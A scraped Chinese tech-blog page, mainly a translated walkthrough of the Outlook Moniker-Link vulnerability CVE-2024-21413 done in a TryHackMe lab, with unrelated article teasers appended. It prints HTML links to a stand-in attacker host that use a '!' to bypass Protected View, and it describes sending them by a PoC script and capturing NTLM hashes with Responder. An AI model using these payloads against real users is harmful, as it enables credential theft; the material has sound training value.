news 2026/9/2 22:53:27

微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

Moniker-Link微软威胁分析:CVE-2024–21413

作者:#$ubh@nk@r
阅读时间:约3分钟
发布日期:2024年2月23日

简介:各位黑客朋友大家好!今天我将为大家介绍近期微软Outlook产品的一个漏洞。该漏洞于2024年2月13日公布。让我们深入了解其细节以及如何利用它。

此漏洞在处理一种特定类型的超链接(称为Moniker Link)时,能够绕过Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦用户点击该超链接,Outlook就会将用户的NTLMv2凭据发送给攻击者。

漏洞原理展示:

Outlook可以将电子邮件渲染为HTML。此外,Outlook能够解析诸如HTTP和HTTPS之类的超链接。然而,它也可以打开指向特定应用程序的URL,这些被称为Moniker Links。

通常,当触发外部应用程序时,Outlook会弹出安全警告。如果使用的是skypekeyword,那么警告会像这样显示。
这个弹窗是Outlook“受保护的视图”功能的结果。如果攻击者创建一个恶意超链接,同样会产生安全警报。

<p><ahref="file://ATTACKER_MACHINE/test">Click me</a></p>

但是,这个警报可以通过使用一个特殊字符来绕过 →!

<p><ahref="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

利用过程:

要利用此漏洞,我们需要创建一个邮件服务器。你可以在TryHackMe实验室中尝试。

CMNatic帮助我们创建了一个Python脚本,用于通过SMTPServer自动化地向受害者发送邮件。

GitHub - CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM Lab
CVE-2024-21413 PoC for THM Lab. 在GitHub上创建账户以贡献CMNatic/CVE-2024-21413的开发。
github.com

现在运行脚本。
注意:请在第31行将Attacker_IP和MAILSERVER_IP修改为受害者的IP地址。
邮件已送达。

现在启动你的Responder来捕获NTLM哈希。

打开受害者的Outlook收件箱。你可以看到邮件已经送达。现在,如果你点击“Click me”,由于那个特殊字符!的存在,将不会弹出安全警报。否则,它会显示警报。

如果你点击了该链接,你将会获得受害者的NTLM哈希。

总结:

以上就是该漏洞的利用方式。

感谢阅读!

如果你喜欢这篇文章,别忘了点赞并关注我,以获取更多文章。

祝黑客之旅愉快~
CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLQKZqtp5udwihyDPFTm5IRv37dlo2W+4VY3z1d0M7aWubJiUxybkI3nx55gCmDWobsitrjS0yiQJF3ZKoUJ66E
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/8/31 4:29:37

Charticulator:解锁数据可视化无限创意的智能设计平台

Charticulator&#xff1a;解锁数据可视化无限创意的智能设计平台 【免费下载链接】charticulator Interactive Layout-Aware Construction of Bespoke Charts 项目地址: https://gitcode.com/gh_mirrors/ch/charticulator 在数字化转型浪潮中&#xff0c;数据可视化已成…

作者头像 李华
网站建设 2026/9/2 4:07:52

为什么顶级团队都在用Open-AutoGLM?一文看懂其架构设计精髓

第一章&#xff1a;Open-AutoGLM详细介绍Open-AutoGLM 是一个开源的自动化通用语言模型&#xff08;General Language Model, GLM&#xff09;推理与部署框架&#xff0c;专为简化大语言模型在异构硬件环境下的运行流程而设计。该框架支持多种主流 GLM 架构的自动转换、量化优化…

作者头像 李华
网站建设 2026/8/28 10:14:45

5分钟打造你的专属桌面互动伴侣:终极配置指南

5分钟打造你的专属桌面互动伴侣&#xff1a;终极配置指南 【免费下载链接】BongoCat 让呆萌可爱的 Bongo Cat 陪伴你的键盘敲击与鼠标操作&#xff0c;每一次输入都充满趣味与活力&#xff01; 项目地址: https://gitcode.com/gh_mirrors/bong/BongoCat 在日复一日的数字…

作者头像 李华
网站建设 2026/8/29 11:18:26

Dify在法律文书生成中的格式规范性保障

Dify在法律文书生成中的格式规范性保障 在律师事务所的日常工作中&#xff0c;一份起诉状可能因为标题层级错位、引用法条过时或缺少关键段落而被法院退回&#xff1b;一份合同因金额书写格式不统一、签名位置缺失而在商务谈判中显得不够专业。这些看似“细节”的问题&#xff…

作者头像 李华
网站建设 2026/8/27 13:56:43

openmv与stm32通信实时性分析:STM32F4性能测试报告

OpenMV与STM32通信实时性实测&#xff1a;如何榨干STM32F4的串口性能&#xff1f;你有没有遇到过这种情况——OpenMV明明“咔嚓”一下就识别出了目标&#xff0c;但你的小车却慢半拍地转向&#xff1f;或者AGV在避障时突然抖了一下&#xff0c;像是卡顿了一帧视觉&#xff1f;别…

作者头像 李华
网站建设 2026/9/2 7:00:04

Dify平台的会话上下文长度管理策略

Dify平台的会话上下文长度管理策略 在构建智能客服、AI助手或内容生成系统时&#xff0c;你是否曾遇到这样的尴尬&#xff1a;用户刚聊到第三轮&#xff0c;AI突然“失忆”&#xff0c;忘了之前说好的角色设定&#xff1b;或者更糟——请求直接报错&#xff0c;提示“上下文过长…

作者头像 李华